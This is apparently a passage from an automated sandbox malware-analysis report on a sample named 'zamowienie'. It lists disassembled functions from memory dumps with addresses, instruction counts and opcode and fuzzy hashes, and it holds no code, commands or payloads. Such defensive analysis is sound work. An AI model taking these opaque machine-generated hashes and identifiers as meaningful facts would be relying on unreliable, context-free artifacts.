                                                                                                                                              • Opcode Fuzzy Hash: 528da9ddb578fd2c0c7711aad641cd6eae26239039f73437af435b1364303965
                                                                                                                                              • Instruction Fuzzy Hash: D141A9BAD01229EFD711DBE48840AAFB7BCEF44654F494966E900F7210D734DD029BE4
                                                                                                                                              Function 34F91CF9 Relevance: .1, Instructions: 143COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                                                              • Instruction ID: 4034735ce1d65abb17897146247c5dceddeb929f8b4ac312674f6060bd14e028
                                                                                                                                              • Opcode Fuzzy Hash: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                                                              • Instruction Fuzzy Hash: 7641C976B00706EFFB05FE54C950EFA77EAEB84794F59887AA8019B250DE30DD428790
                                                                                                                                              Function 34FC35D7 Relevance: .1, Instructions: 139COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                              • Instruction ID: a51dc6027070af193ef819bd4aa2b007432b55bc72f21a7c658ba59d327f1b88
                                                                                                                                              • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                              • Instruction Fuzzy Hash: EF515AB6240606EFDB15CF14C580A56BBB5FF45348F1984AAE8089F222E771ED86CF90
                                                                                                                                              Function 34EFD534 Relevance: .1, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 67d63a152cde09095350f970b2db491c6d070ef1ad6a8f8693e5c1d84d2d44bf
                                                                                                                                              • Instruction ID: dafdcfe2332d0856a6a121a17bc80ab7231183e9b4433e4596a6a4c65276279c
                                                                                                                                              • Opcode Fuzzy Hash: 67d63a152cde09095350f970b2db491c6d070ef1ad6a8f8693e5c1d84d2d44bf
                                                                                                                                              • Instruction Fuzzy Hash: D351DE76704781CFE715CB5CC840F1A7BE5AB80B94F4A08A9F815CB6A1DB39EC41CB61
                                                                                                                                              Function 34EEB136 Relevance: .1, Instructions: 131COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d3a57e00095edfd92a2fce4d0ed49ec24009cba2a25e9c14f4d6e501ba9306a7
                                                                                                                                              • Instruction ID: 8e6746034bc80f2f1806083b13f50600f116d81c81f29f45d82a0997564c8505
                                                                                                                                              • Opcode Fuzzy Hash: d3a57e00095edfd92a2fce4d0ed49ec24009cba2a25e9c14f4d6e501ba9306a7
                                                                                                                                              • Instruction Fuzzy Hash: 7941E1B5642701EFF711DF65C840B2ABBE8EF44794F098869E550DB2A1DB70D982CFA0
                                                                                                                                              Function 34FC14F6 Relevance: .1, Instructions: 130COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b380a7b99039301758d9adc33b1ffbc572217749e03316caadecbdf3ecf4d60
                                                                                                                                              • Instruction ID: 35c18e6d2811e85daab8cb7e3c7b97c9be31c0b85da220c9661b9b68f0c569bc
                                                                                                                                              • Opcode Fuzzy Hash: 2b380a7b99039301758d9adc33b1ffbc572217749e03316caadecbdf3ecf4d60
                                                                                                                                              • Instruction Fuzzy Hash: 7D41F271A00612DFFB09DF64C980BEAB7B5BF08700F0C496AE5099B291D7369C62CF90
                                                                                                                                              Function 34F1D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 958ca95da72a960dd2ca23ca2b2557e00b9e732d2e00a3e07a33b39c044e5c78
                                                                                                                                              • Instruction ID: cb64fcddc2cfe866e27737d2e16a986ddd7626d4341fc08335235a8df425f825
                                                                                                                                              • Opcode Fuzzy Hash: 958ca95da72a960dd2ca23ca2b2557e00b9e732d2e00a3e07a33b39c044e5c78
                                                                                                                                              • Instruction Fuzzy Hash: 9A4104B1115210DFE320DF65D880E2A77A8EF44361F09096DF815572A0DB34E843CBE2
                                                                                                                                              Function 34FBDC27 Relevance: .1, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dd632eb7dd0512b0dec1d4647b985e127c3e0db785ad161786b6a891df254190
                                                                                                                                              • Instruction ID: a9132c398c0c87ea7fd70b7afddb7dd34d5000219afbf7c09db3b3ccaf6184cc
                                                                                                                                              • Opcode Fuzzy Hash: dd632eb7dd0512b0dec1d4647b985e127c3e0db785ad161786b6a891df254190
                                                                                                                                              • Instruction Fuzzy Hash: D2419DB52043018FEB16CF2AC880B2BBBE5EF89754F48492DE8C5C7351DA74D847CA92
                                                                                                                                              Function 34F1FCA0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35af5ecc28e14fa6c5e9fbc1b00febadb38147121ca011ac87a52f0b1b10582b
                                                                                                                                              • Instruction ID: 22b1aba0b43093524171bf1baf77ba1b4baef62ae52b25bacbfdb0f1a0029ece
                                                                                                                                              • Opcode Fuzzy Hash: 35af5ecc28e14fa6c5e9fbc1b00febadb38147121ca011ac87a52f0b1b10582b
                                                                                                                                              • Instruction Fuzzy Hash: 1741AD75B19B44CFF720CF28C454B2677A4BB44764F484A5DE8968B682CB38D583CB91
                                                                                                                                              Function 34FC7120 Relevance: .1, Instructions: 110COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                                                                                                              • Instruction ID: 62f1da80f5a26ba7411c05108a18f11ca471cb8656abbbfc67572e039eef6564
                                                                                                                                              • Opcode Fuzzy Hash: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                                                                                                              • Instruction Fuzzy Hash: 1B41DCF56017069FE7218F65C954E97B7ECEF44A60F444D1EA4A6D7290D730EA02CB50
                                                                                                                                              Function 34F974B0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1394e896d1403f2df001659c5af764d7b0fcc890f0b99b3872099a65ad3ba192
                                                                                                                                              • Instruction ID: 051b63a6d6da274ede6c9f6100e20a3945eab12d5494d7f0a70aa780e651fdfc
                                                                                                                                              • Opcode Fuzzy Hash: 1394e896d1403f2df001659c5af764d7b0fcc890f0b99b3872099a65ad3ba192
                                                                                                                                              • Instruction Fuzzy Hash: 114158B8A00306DFEB85CF69C5807DABBE2BF48244F68C96DD4499B251D732D943CB90
                                                                                                                                              Function 34EE7C40 Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ab1ab5fa1609dfe1117bbfa6462ca5d802c1aa580f1c6003c2cf363002756b0
                                                                                                                                              • Instruction ID: 0b49cefaac40d7c42f72028515fa0e75a8676784a18b578b3e23d1b37a532783
                                                                                                                                              • Opcode Fuzzy Hash: 6ab1ab5fa1609dfe1117bbfa6462ca5d802c1aa580f1c6003c2cf363002756b0
                                                                                                                                              • Instruction Fuzzy Hash: A2312831601B10EFE3229F19CC41F2A7BA9FF407A0F594D59E4594B691DF20E942DB90
                                                                                                                                              Function 34F19274 Relevance: .1, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 928ecc8dbe88fc1b31f002f6e5c42defa28b6ca6bece5b70f673715597d78c09
                                                                                                                                              • Instruction ID: b880645ac1c332eccf622d71e13629e0cc8c062e21ed4be376a77e8c6c6d80d0
                                                                                                                                              • Opcode Fuzzy Hash: 928ecc8dbe88fc1b31f002f6e5c42defa28b6ca6bece5b70f673715597d78c09
                                                                                                                                              • Instruction Fuzzy Hash: 9231D376A01328EFEB25CB24DC40F9A77B9EF85750F4905D9A44DA7290CB309E86CF91
                                                                                                                                              Function 34F9B2F0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                                                                              • Instruction ID: 3aa18fc494411a2ca28dd581b5af8fffd20bbdffee5a1b093f2b4f5017f62dd4
                                                                                                                                              • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                                                                              • Instruction Fuzzy Hash: 23316C75600B11DFE721CF6AC480E5AB7F5FF48254B68C96DE5498B650E731E842CF40
                                                                                                                                              Function 34F150E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                              • Instruction ID: 9209f6aba1f49591b25823a91477d53401f4fcca1b16af8e0a1753ff731d0902
                                                                                                                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                              • Instruction Fuzzy Hash: 7E312472708341DFE752CA18C800767B7E9AB85798F4C996DF4849B390D6B4C943C792
                                                                                                                                              Function 34EE9730 Relevance: .1, Instructions: 96COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 1a1b537fab8edfa45ab53061e94dd011ecdfc41fbac9bdfe175b9c4c23162723
                                                                                                                                              • Instruction ID: d18f54fcc2e5a9b5c823774948c8738cf71c19ca258aa3afb21e0440c816fa6f
                                                                                                                                              • Opcode Fuzzy Hash: 1a1b537fab8edfa45ab53061e94dd011ecdfc41fbac9bdfe175b9c4c23162723
                                                                                                                                              • Instruction Fuzzy Hash: 4D21AF76A00714EFE3228F68C800B2B7BF5FF84664F1A4869A5959B351DB30DC86CF90
                                                                                                                                              Function 34EED6AA Relevance: .1, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                                              • Instruction ID: c3cd0bab89d7aedbc8f67615b8a41e7fbfd19a61339be309649bbc4fa127ba8b
                                                                                                                                              • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                                              • Instruction Fuzzy Hash: 223191BAA01606EFEB12CFD4C980F7A73A9EF84759F598828ED049B250D774DD81CB50
                                                                                                                                              Function 34FC1C3C Relevance: .1, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                              • Instruction ID: 02cd1fa152e2886bcaa99fbb27aa83285c1abcbc7a8163a76d08c88f858c6110
                                                                                                                                              • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                              • Instruction Fuzzy Hash: FB31B0B2E00219EFC714DF69C980AADB7B1FF98315F158569E854DB341D734AA12CFA0
                                                                                                                                              Function 34EE9D96 Relevance: .1, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                                                              • Instruction ID: e2f94c77c3a54bb80c3bc100098d5627582f3d572b733f351d6038027e4b081c
                                                                                                                                              • Opcode Fuzzy Hash: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                                                              • Instruction Fuzzy Hash: 6331B4B2700610EFE711CF58CC80B5ABBE9EB85A54F1D8459E548DF352DA35DE42CBA0
                                                                                                                                              Function 34F47190 Relevance: .1, Instructions: 89COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                              • Instruction ID: e06d7ff4f909ebe70df6819d17b4e018c38f26245d4cdb8c89b59dafcb5225ac
                                                                                                                                              • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                              • Instruction Fuzzy Hash: 94314779604346CFC700CF19C480946BBF5FF89354B298AA9E9589B325EB30EE46CF91
                                                                                                                                              Function 34EF92C5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                              • Instruction ID: bc742e532f2b5250c5163fd39ba9484b8ca43e46e3b3cdd6543067798c4c3a58
                                                                                                                                              • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                              • Instruction Fuzzy Hash: FE316AB6609349CFD701CF18D84095A7BE9FF89350F0609A9F890973A1DB31DC15CBA2
                                                                                                                                              Function 34F21C7C Relevance: .1, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
